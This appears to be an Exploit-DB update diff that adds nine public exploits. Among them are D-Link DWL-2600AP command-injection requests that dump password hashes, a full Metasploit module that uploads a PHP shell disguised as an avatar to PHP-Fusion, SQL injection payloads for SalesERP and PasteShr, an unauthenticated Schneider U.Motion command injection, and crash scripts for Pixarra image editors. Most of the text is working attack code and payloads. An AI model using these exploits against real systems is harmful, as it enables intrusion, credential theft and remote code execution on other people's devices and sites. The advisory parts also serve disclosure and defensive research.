DB: 2019-05-15

9 changes to exploits/shellcodes

Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)

PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)
Sales ERP 8.1 - Multiple SQL Injection
D-Link DWL-2600AP - Multiple OS Command Injection
Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection
PasteShr 1.6 - Multiple SQL Injection

exploits/hardware/webapps/46841.txt

@@ -0,0 +1,351 @@
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
+URL Path :
+[+] /admin.cgi?action=config_restore
+
+Vulnerable POST Form Data Parameter:
+[+] configRestore
+[+] configServerip
+===========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "configRestore"
+and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
+
+
+--- PoC Session Logs ---
+POST /admin.cgi?action=config_restore HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 357
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; 
+User-Agent: Xxxxxxxx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=config_restore
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
+
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="optprotocol"
+
+up
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="configRestore"
+
+;whoami;
+------WebKitFormBoundary4ZAwHsdySFjwNXxE
+Content-Disposition: form-data; name="configServerip"
+
+;cat /var/passwd;cat /var/passwd
+------WebKitFormBoundary4ZAwHsdySFjwNXxE--
+
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;command2
+
+
+----+Discovered By Raki Ben Hamouda----+
+
+
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
+URL Path :
+[+] /admin.cgi?action=config_save
+
+Vulnerable POST Form Data Parameter:
+[+] configBackup
+[+] downloadServerip
+==========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote or local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "configBackup"
+and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
+
+--- PoC Session Logs ---
+POST /admin.cgi?action=config_save HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 114
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Xxxxxxxx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=config_save
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
+
+check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
+
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+sh: .xml: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;etc...
+
+
+----+Discovered By Raki Ben Hamouda----+
+
+
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
+URL Path :
+[+] /admin.cgi?action=upgrade
+
+Vulnerable POST Form Data Parameter:
+[+] firmwareRestore
+[+] firmwareServerip
+
+===========================
+Device Firmware version :
+[+] 4.2.0.15
+
+Hardware Version :
+[+] A1
+
+Device name :
+[+] D-Link AP
+
+Product Identifier : 
+[+] WLAN-EAP
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by local authenticated attackers.
+there is no input validation on the POST Form Data Parameter "firmwareRestore"
+and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
+The attacker has to know the credentials in order to access the Panel .
+For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
+
+--- PoC Session Logs ---
+
+POST /admin.cgi?action=upgrade HTTP/1.1
+Host: localhost
+Connection: keep-alive
+Content-Length: 525
+Cache-Control: max-age=0
+Origin: http://localhost
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data;
+User-Agent: xxxxxxxxw
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost/admin.cgi?action=upgrade
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
+Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
+
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="optprotocol"
+
+up
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="firmwareRestore"
+
+;whoami;whoami
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="firmwareServerip"
+
+;cat /var/passwd;cat /var/passwd
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL
+Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
+
+up
+------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
+
+----------->Response----------->
+
+HTTP/1.0 200 OK
+Content-Type: text/html; charset=UTF-8
+
+/usr/bin/tftp: option requires an argument -- r
+BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
+
+Usage: tftp [OPTIONS] HOST [PORT]
+
+Transfer a file from/to tftp server
+
+Options:
+	-l FILE	Local FILE
+	-r FILE	Remote FILE
+	-g	Get file
+	-p	Put file
+	-b SIZE	Transfer blocks of SIZE octets
+
+sh: whoami: not found
+sh: whoami: not found
+root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
+admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
+nobody:x:99:99:nobody:/:/bin/false
+
+Note : for testing put the values in the fields like this : 
+;command1;same_command1;command2;etc...
+----+Discovered By Raki Ben Hamouda----+

exploits/php/remote/46839.rb

@@ -0,0 +1,206 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution",
+      'Description' => %q(
+        This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions.
+        It is possible to execute commands in the system with ordinary user authority. No need admin privilage.
+        There is almost no control in the avatar upload section in the profile edit area.
+        Only a client-based control working with javascript. (Simple pre-check)
+        If we do not care about this control, the desired file can be sent to the server via Interception-Proxies. 
+        The module opens the meterpreter session for you by bypassing the controls.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
+          ['URL', 'https://www.php-fusion.co.uk']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 11 2019",
+      'DefaultTarget' => 0))
+ 
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [true, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def exec
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url
+    })
+  end
+##
+# Login and cookie information gathering
+##
+  def login(uname, pass, check)
+    # 1st request to get fusion_token 
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "home.php")
+    })
+
+    cookie = res.get_cookies
+    @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    # 2nd request to login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'home.php'),
+      'cookie'   => cookie,
+      'vars_post' => {
+        'fusion_token' => @fustoken,
+        'form_id' => 'loginform',
+        'user_name' => uname,
+        'user_pass' => pass,
+        'login' => ''
+      }
+    )
+
+    cookie = res.get_cookies
+    location = res.redirection.to_s
+    if res && res.code == 302 && location.include?('login.php?error')
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
+    else
+      return cookie
+    end
+
+    return nil
+  end
+##
+# Upload malicious file // payload integration
+##
+  def upload_shell(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => cookie
+    })
+
+    ncookie = cookie + " " + res.get_cookies # gathering all cookie information
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => ncookie
+    })
+
+    # fetch some necessary post data informations
+    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
+    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
+    usermail = res.body.split("user_email' value='")[1].split("' >")[0]
+
+    # data preparation to delete priv avatar
+    delete = Rex::MIME::Message.new
+    delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
+    delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
+    delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
+    delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
+    delete.add_part('1', nil, nil, 'form-data; name="delAvatar"')
+    delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
+    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
+    deld = delete.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => deld,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{delete.bound}",
+      'cookie' => ncookie,
+      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
+    })
+    # priv avatar deleted.
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => cookie
+    })
+
+    ncookie = cookie + " " + res.get_cookies # recheck cookies
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
+      'cookie'   => ncookie
+    })
+
+    # They changed. fetch again...
+    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
+    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
+    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
+    usermail = res.body.split("user_email' value='")[1].split("' >")[0]
+    # The "php" string must be removed for bypass.We can use "<?"
+    pay = payload.encoded.split("/**/")[1]
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
+    @shell = "#{fname}"
+    # data preparation to upload new avatar
+    pdata = Rex::MIME::Message.new
+    pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
+    pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
+    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
+    pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
+    pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"')
+    pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"")
+    pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
+    pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
+    pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
+    data = pdata.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
+      'cookie' => ncookie,
+      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
+    })
+
+    location = res.redirection.to_s
+    if res && res.code == 302 && location.include?('error')
+      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
+    else
+      print_status("Trying to upload #{fname}")
+      return true
+    end
+   
+  end
+##
+# Exploit controls and information
+##
+  def exploit
+    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
+      
+    if upload_shell(cookie, true)
+      print_good("Control was bypassed. Harmful file upload successfully!")
+      exec
+    end
+  end
+##
+# The end of the adventure (o_O) // AkkuS
+##
+end

exploits/php/webapps/46840.txt

@@ -0,0 +1,85 @@
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : customer_id, product_id
+# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL
+Inject Here]
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Software Link:
+http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : supplier_name
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Software Link:
+http://www.codelist.cc/scripts/236407-erp-v810-business-erp-solution-product-shop-company-management-nulled.html
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : supplier_name
+# Attack Pattern : 1260781%27 oR
+if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT
+INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
+===========================================================================================

exploits/php/webapps/46846.txt

@@ -0,0 +1,109 @@
+RCE Security Advisory
+https://www.rcesecurity.com
+
+
+1. ADVISORY INFORMATION
+=======================
+Product:        Schneider Electric U.Motion Builder
+Vendor URL:     www.schneider-electric.com
+Type:           OS Command Injection [CWE-78]
+Date found:     2018-11-15
+Date published: 2019-05-13
+CVSSv3 Score:   9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+CVE:            CVE-2018-7841
+
+
+2. CREDITS
+==========
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+
+
+3. VERSIONS AFFECTED
+====================
+Schneider Electric U.Motion Builder 1.3.4 and below
+
+
+4. INTRODUCTION
+===============
+Comfort, Security and Energy Efficiency – these are the qualities that you as
+home owner expect from a futureproof building management solution.
+
+(from the vendor's homepage)
+
+
+5. VULNERABILITY DETAILS
+========================
+The script "track_import_export.php" is vulnerable to an unauthenticated
+command injection vulnerability when user-supplied input to the HTTP GET/POST
+parameter "object_id" is processed by the web application. Since the application
+does not properly validate and sanitize this parameter, it is possible to inject
+arbitrary commands into a PHP exec call. This is a bypass to the fix implemented
+for CVE-2018-7765.
+
+The following Proof-of-Concept triggers this vulnerability causing a 10 seconds
+sleep:
+
+POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 86
+
+op=export&language=english&interval=1&object_id=`sleep 10`
+
+
+6. RISK
+=======
+To successfully exploit this vulnerability an unauthenticated attacker must only
+have network-level access to a vulnerable instance of U.Motion Builder or a product
+that depends on it.
+
+The vulnerability can be used to inject arbitrary OS commands, which leads to the
+complete compromise of the affected installation.
+
+
+7. SOLUTION
+===========
+Uninstall/remove the installation.
+
+The product has been retired shortly after notifying the vendor about this issue,
+so no fix will be published.
+
+
+8. REPORT TIMELINE
+==================
+2018-11-14: Discovery of the vulnerability
+2018-11-14: Tried to notify vendor via their vulnerability report form
+            but unfortunately the form returned some 403 error
+2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM)
+2018-11-19: No response from vendor
+2018-11-20: Tried to contact the vendor via Twitter again
+2018-11-20: No response from vendor
+2019-01-04: Without further notice the contact form worked again. Sent over
+            the vulnerability details.
+2019-01-04: Response from the vendor stating that the affected code is owned by
+            a third-party vendor. Projected completion time is October 2019.
+2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy.
+2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15.
+2019-01-15: Agreed on the disclosure extension due to the severity of the issue
+2019-02-01: No further reply from vendor. Reminded them of the regular status
+            updates according to the disclosure policy
+2019-02-04: Regular status updates from vendor from now on
+2019-03-13: Vendor sends draft disclosure notification including assigned
+            CVE-2018-7841. The draft states that the product will be retired
+            and has already been removed from the download portal. A customer
+            notification is published (SEVD-2019-071-02).
+2019-03-14: Public disclosure is delayed to give the vendor's customers a chance
+            to remove the product.
+2019-05-13: Public disclosure
+
+
+9. REFERENCES
+=============
+https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day

exploits/php/webapps/46847.txt

@@ -0,0 +1,78 @@
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : keyword
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern :
+/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
+# POST Method :
+http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : keyword
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# POST Method :
+http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
+===========================================================================================

exploits/windows/dos/46842.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
+# Version: 2.17
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open Selfie Studio
+# 4.- Go to 'Image' > 'Resize Image...' 
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46843.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Image' > 'Resize Image...' 
+# 5.- Paste clipboard in the 'New Width/New Height' field
+# 6.- Click OK
+# 7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46844.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
+# 2.- Copy the text from the generated PoC.txt file to clipboard
+# 3.- Open TwistedBrush Pro Studio
+# 4.- Go to 'Record' > 'Script Recorder...' 
+# 5.- Paste clipboard in the 'Description' field
+# 6.- Click 'Brush' button
+# 7.- Crashed
+
+buffer = "\x41" * 500000
+f = open ("PoC.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46845.py

@@ -0,0 +1,20 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
+# Date: 13/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.pixarra.com
+# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
+# Version: 24.06
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
+# 2.- Open TwistedBrush Pro Studio
